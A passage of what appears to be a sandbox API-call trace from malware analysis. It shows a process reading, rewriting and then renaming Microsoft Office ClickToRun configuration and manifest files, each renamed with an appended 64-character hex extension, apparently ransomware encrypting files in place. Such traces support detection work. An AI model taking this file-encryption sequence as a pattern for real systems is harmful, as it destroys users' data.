CloseHandle (hObject=0x590) returned 1 [0155.361] GetProcessHeap () returned 0x270000 [0155.362] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7420068 | out: hHeap=0x270000) returned 1 [0155.362] RtlInterlockedCompareExchange64 () returned 0x1 [0155.362] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0155.375] ReadFile (in: hFile=0x58c, lpBuffer=0x7420190, nNumberOfBytesToRead=0x600, lpNumberOfBytesRead=0x0, lpOverlapped=0x7400058 | out: lpBuffer=0x7420190*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7400058) returned 1 [0155.375] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0155.377] NtQueryObject (in: Handle=0x58c, ObjectInformationClass=0x1, ObjectInformation=0x7400108, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x7400108, ReturnLength=0x72aff5c) returned 0x0 [0155.379] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.0.xml", lpString2=".214D653AEC68B28435118E76B5EECC97FE729076E16536A3A4FE51245B9C7140" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.0.xml.214D653AEC68B28435118E76B5EECC97FE729076E16536A3A4FE51245B9C7140") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.0.xml.214D653AEC68B28435118E76B5EECC97FE729076E16536A3A4FE51245B9C7140" [0155.379] GetProcessHeap () returned 0x270000 [0155.379] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x132) returned 0x4262a08 [0155.379] NtSetInformationFile (FileHandle=0x58c, IoStatusBlock=0x72aff4c, FileInformation=0x4262a08, Length=0x132, FileInformationClass=0xa) returned 0x0 [0155.380] CloseHandle (hObject=0x58c) returned 1 [0155.383] GetProcessHeap () returned 0x270000 [0155.385] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7400058 | out: hHeap=0x270000) returned 1 [0155.385] RtlInterlockedCompareExchange64 () returned 0x1 [0155.385] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0155.389] ReadFile (in: hFile=0x58c, lpBuffer=0x7420190, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x0, lpOverlapped=0x7400058 | out: lpBuffer=0x7420190*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7400058) returned 1 [0155.389] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0155.390] WriteFile (in: hFile=0x58c, lpBuffer=0x7420190*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7400058 | out: lpBuffer=0x7420190*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7400058) returned 1 [0155.391] RtlInterlockedCompareExchange64 () returned 0x0 [0155.391] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0155.392] NtQueryObject (in: Handle=0x58c, ObjectInformationClass=0x1, ObjectInformation=0x7400108, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x7400108, ReturnLength=0x72aff5c) returned 0x0 [0155.393] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.2.xml", lpString2=".D6A2249DDF8064329033C9A7BBBF3DF511643078853BA3AA136EBCF9A5E87D5C" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.2.xml.D6A2249DDF8064329033C9A7BBBF3DF511643078853BA3AA136EBCF9A5E87D5C") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\DeploymentConfig.2.xml.D6A2249DDF8064329033C9A7BBBF3DF511643078853BA3AA136EBCF9A5E87D5C" [0155.393] GetProcessHeap () returned 0x270000 [0155.393] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x132) returned 0x42628c0 [0155.393] NtSetInformationFile (FileHandle=0x58c, IoStatusBlock=0x72aff4c, FileInformation=0x42628c0, Length=0x132, FileInformationClass=0xa) returned 0x0 [0155.395] CloseHandle (hObject=0x58c) returned 1 [0155.399] GetProcessHeap () returned 0x270000 [0155.401] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7400058 | out: hHeap=0x270000) returned 1 [0155.405] RtlInterlockedCompareExchange64 () returned 0x1 [0155.405] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0155.421] ReadFile (in: hFile=0x5a0, lpBuffer=0x747b318, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x0, lpOverlapped=0x745b1e0 | out: lpBuffer=0x747b318*, lpNumberOfBytesRead=0x0, lpOverlapped=0x745b1e0) returned 1 [0155.421] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0155.423] NtQueryObject (in: Handle=0x5a0, ObjectInformationClass=0x1, ObjectInformation=0x745b290, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x745b290, ReturnLength=0x72aff5c) returned 0x0 [0155.424] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\DeploymentConfiguration.xml", lpString2=".DEAF24BCDA1C26BB18095BD15DD89C02A02ECD1C2A8022FC475615F6A654C85E" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\DeploymentConfiguration.xml.DEAF24BCDA1C26BB18095BD15DD89C02A02ECD1C2A8022FC475615F6A654C85E") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\DeploymentConfiguration.xml.DEAF24BCDA1C26BB18095BD15DD89C02A02ECD1C2A8022FC475615F6A654C85E" [0155.424] GetProcessHeap () returned 0x270000 [0155.424] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x212) returned 0x368ec0 [0155.424] NtSetInformationFile (FileHandle=0x5a0, IoStatusBlock=0x72aff4c, FileInformation=0x368ec0, Length=0x212, FileInformationClass=0xa) returned 0x0 [0155.426] CloseHandle (hObject=0x5a0) returned 1 [0155.429] GetProcessHeap () returned 0x270000 [0155.430] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x745b1e0 | out: hHeap=0x270000) returned 1 [0155.430] RtlInterlockedCompareExchange64 () returned 0x1 [0155.430] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0155.434] ReadFile (in: hFile=0x5a0, lpBuffer=0x747b318, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x745b1e0 | out: lpBuffer=0x747b318*, lpNumberOfBytesRead=0x0, lpOverlapped=0x745b1e0) returned 1 [0155.435] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0155.437] NtQueryObject (in: Handle=0x5a0, ObjectInformationClass=0x1, ObjectInformation=0x745b290, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x745b290, ReturnLength=0x72aff5c) returned 0x0 [0155.438] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\Manifest.xml", lpString2=".08D54B76EAF56ADF0302F1E50AE36771095D6B4F128CA564E09045D6359F4E2C" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\Manifest.xml.08D54B76EAF56ADF0302F1E50AE36771095D6B4F128CA564E09045D6359F4E2C") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\Manifest.xml.08D54B76EAF56ADF0302F1E50AE36771095D6B4F128CA564E09045D6359F4E2C" [0155.438] GetProcessHeap () returned 0x270000 [0155.438] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1f4) returned 0x42b5ad8 [0155.439] NtSetInformationFile (FileHandle=0x5a0, IoStatusBlock=0x72aff4c, FileInformation=0x42b5ad8, Length=0x1f4, FileInformationClass=0xa) returned 0x0 [0155.441] CloseHandle (hObject=0x5a0) returned 1 [0155.759] GetProcessHeap () returned 0x270000 [0155.761] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x745b1e0 | out: hHeap=0x270000) returned 1 [0155.761] RtlInterlockedCompareExchange64 () returned 0x1 [0155.761] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0155.765] ReadFile (in: hFile=0x5a0, lpBuffer=0x747b318, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x0, lpOverlapped=0x745b1e0 | out: lpBuffer=0x747b318*, lpNumberOfBytesRead=0x0, lpOverlapped=0x745b1e0) returned 1 [0155.766] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0155.766] WriteFile (in: hFile=0x5a0, lpBuffer=0x747b318*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x745b1e0 | out: lpBuffer=0x747b318*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x745b1e0) returned 1 [0155.767] RtlInterlockedCompareExchange64 () returned 0x0 [0155.767] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0155.768] NtQueryObject (in: Handle=0x5a0, ObjectInformationClass=0x1, ObjectInformation=0x745b290, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x745b290, ReturnLength=0x72aff5c) returned 0x0 [0155.769] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserDeploymentConfiguration.xml", lpString2=".88661BF345C76E09AF0B34C5F4B24A6C67182A64B9D1A7F7B3A0B1E0D5D4DF3F" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserDeploymentConfiguration.xml.88661BF345C76E09AF0B34C5F4B24A6C67182A64B9D1A7F7B3A0B1E0D5D4DF3F") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\UserDeploymentConfiguration.xml.88661BF345C76E09AF0B34C5F4B24A6C67182A64B9D1A7F7B3A0B1E0D5D4DF3F" [0155.769] GetProcessHeap () returned 0x270000 [0155.769] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x21a) returned 0x3690e8 [0155.770] NtSetInformationFile (FileHandle=0x5a0, IoStatusBlock=0x72aff4c, FileInformation=0x3690e8, Length=0x21a, FileInformationClass=0xa) returned 0x0 [0155.772] CloseHandle (hObject=0x5a0) returned 1 [0155.775] GetProcessHeap () returned 0x270000 [0155.776] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x745b1e0 | out: hHeap=0x270000) returned 1 [0155.776] RtlInterlockedCompareExchange64 () returned 0x1 [0155.776] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0155.780] ReadFile (in: hFile=0x5a0, lpBuffer=0x747b318, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x745b1e0 | out: lpBuffer=0x747b318*, lpNumberOfBytesRead=0x0, lpOverlapped=0x745b1e0) returned 1 [0155.780] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0156.031] ReadFile (in: hFile=0x594, lpBuffer=0x746a2f8, nNumberOfBytesToRead=0x2600, lpNumberOfBytesRead=0x0, lpOverlapped=0x744a1c0 | out: lpBuffer=0x746a2f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x744a1c0) returned 1 [0156.032] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0156.046] NtQueryObject (in: Handle=0x598, ObjectInformationClass=0x1, ObjectInformation=0x749a520, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x749a520, ReturnLength=0x72aff5c) returned 0x0 [0156.048] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.excelmui.msi.16.en-us.xml", lpString2=".922B615ACC8F059FEB6E7D488A4A550B60D959D1B77452C61EDE48A5E0A2C872" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.excelmui.msi.16.en-us.xml.922B615ACC8F059FEB6E7D488A4A550B60D959D1B77452C61EDE48A5E0A2C872") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.excelmui.msi.16.en-us.xml.922B615ACC8F059FEB6E7D488A4A550B60D959D1B77452C61EDE48A5E0A2C872" [0156.048] GetProcessHeap () returned 0x270000 [0156.048] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x19e) returned 0x336678 [0156.048] NtSetInformationFile (FileHandle=0x598, IoStatusBlock=0x72aff4c, FileInformation=0x336678, Length=0x19e, FileInformationClass=0xa) returned 0x0 [0156.049] CloseHandle (hObject=0x598) returned 1 [0156.058] GetProcessHeap () returned 0x270000 [0156.059] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x749a470 | out: hHeap=0x270000) returned 1 [0156.059] RtlInterlockedCompareExchange64 () returned 0x2 [0156.059] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0156.161] WriteFile (in: hFile=0x590, lpBuffer=0x74421a0*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068) returned 1 [0156.162] RtlInterlockedCompareExchange64 () returned 0x0 [0156.162] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0156.162] NtQueryObject (in: Handle=0x590, ObjectInformationClass=0x1, ObjectInformation=0x7422118, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x7422118, ReturnLength=0x72aff5c) returned 0x0 [0156.163] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemui.msi.16.en-us.xml", lpString2=".1F2EF13709D55AF692C0D997C18B8891936D170276AC93C70B343B9F2D06D303" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemui.msi.16.en-us.xml.1F2EF13709D55AF692C0D997C18B8891936D170276AC93C70B343B9F2D06D303") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemui.msi.16.en-us.xml.1F2EF13709D55AF692C0D997C18B8891936D170276AC93C70B343B9F2D06D303" [0156.163] GetProcessHeap () returned 0x270000 [0156.163] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1a0) returned 0x4246260 [0156.164] NtSetInformationFile (FileHandle=0x590, IoStatusBlock=0x72aff4c, FileInformation=0x4246260, Length=0x1a0, FileInformationClass=0xa) returned 0x0 [0156.165] CloseHandle (hObject=0x590) returned 1 [0156.170] GetProcessHeap () returned 0x270000 [0156.172] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0156.172] RtlInterlockedCompareExchange64 () returned 0x1 [0156.172] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0156.176] ReadFile (in: hFile=0x590, lpBuffer=0x74421a0, nNumberOfBytesToRead=0x600, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesRead=0x0, lpOverlapped=0x7422068) returned 1 [0156.176] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0156.176] WriteFile (in: hFile=0x590, lpBuffer=0x74421a0*, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068 | out: lpBuffer=0x74421a0*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x7422068) returned 1 [0156.177] RtlInterlockedCompareExchange64 () returned 0x0 [0156.177] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0156.178] NtQueryObject (in: Handle=0x590, ObjectInformationClass=0x1, ObjectInformation=0x7422118, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x7422118, ReturnLength=0x72aff5c) returned 0x0 [0156.179] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemuiset.msi.16.en-us.xml", lpString2=".8281294C5F1B89E3B7B713633CD4E825FEEE45FCCFDC81A652DC2DCB7DC84F41" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemuiset.msi.16.en-us.xml.8281294C5F1B89E3B7B713633CD4E825FEEE45FCCFDC81A652DC2DCB7DC84F41") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.officemuiset.msi.16.en-us.xml.8281294C5F1B89E3B7B713633CD4E825FEEE45FCCFDC81A652DC2DCB7DC84F41" [0156.179] GetProcessHeap () returned 0x270000 [0156.179] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1a6) returned 0x4277e30 [0156.179] NtSetInformationFile (FileHandle=0x590, IoStatusBlock=0x72aff4c, FileInformation=0x4277e30, Length=0x1a6, FileInformationClass=0xa) returned 0x0 [0156.184] CloseHandle (hObject=0x590) returned 1 [0156.275] GetProcessHeap () returned 0x270000 [0156.304] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7422068 | out: hHeap=0x270000) returned 1 [0156.304] RtlInterlockedCompareExchange64 () returned 0x1 [0156.304] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0156.394] NtQueryObject (in: Handle=0x5ac, ObjectInformationClass=0x1, ObjectInformation=0x7562618, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x7562618, ReturnLength=0x72aff5c) returned 0x0 [0156.395] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml", lpString2=".8C735527B3FD0520B7CCD2947806494DB64239F9427227ADB8D09FB311E2497B" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml.8C735527B3FD0520B7CCD2947806494DB64239F9427227ADB8D09FB311E2497B") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Outlook.Outlook.x-none.msi.16.x-none.xml.8C735527B3FD0520B7CCD2947806494DB64239F9427227ADB8D09FB311E2497B" [0156.395] GetProcessHeap () returned 0x270000 [0156.395] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1bc) returned 0x36c080 [0156.395] NtSetInformationFile (FileHandle=0x5ac, IoStatusBlock=0x72aff4c, FileInformation=0x36c080, Length=0x1bc, FileInformationClass=0xa) returned 0x0 [0156.397] CloseHandle (hObject=0x5ac) returned 1 [0156.402] GetProcessHeap () returned 0x270000 [0156.404] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x7562568 | out: hHeap=0x270000) returned 1 [0156.413] RtlInterlockedCompareExchange64 () returned 0x1 [0156.413] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0156.414] WriteFile (in: hFile=0x590, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0156.415] RtlInterlockedCompareExchange64 () returned 0x0 [0156.415] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0156.486] ReadFile (in: hFile=0x590, lpBuffer=0x74e2140, nNumberOfBytesToRead=0x6200, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x74c2008) returned 1 [0156.486] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0156.487] WriteFile (in: hFile=0x590, lpBuffer=0x74e2140*, nNumberOfBytesToWrite=0x6200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008 | out: lpBuffer=0x74e2140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x74c2008) returned 1 [0156.488] RtlInterlockedCompareExchange64 () returned 0x0 [0156.488] GetQueuedCompletionStatus (in: CompletionPort=0x3a0, lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x72aff68, lpCompletionKey=0x72aff64, lpOverlapped=0x72aff60) returned 1 [0156.489] NtQueryObject (in: Handle=0x590, ObjectInformationClass=0x1, ObjectInformation=0x74c20b8, ObjectInformationLength=0x10004, ReturnLength=0x72aff5c | out: ObjectInformation=0x74c20b8, ReturnLength=0x72aff5c) returned 0x0 [0156.491] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.en-us.xml", lpString2=".B98DE14DADA0FB248C2D77D7C55C3F184CDBA83B5540A571FE29C17FD6132C00" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.en-us.xml.B98DE14DADA0FB248C2D77D7C55C3F184CDBA83B5540A571FE29C17FD6132C00") 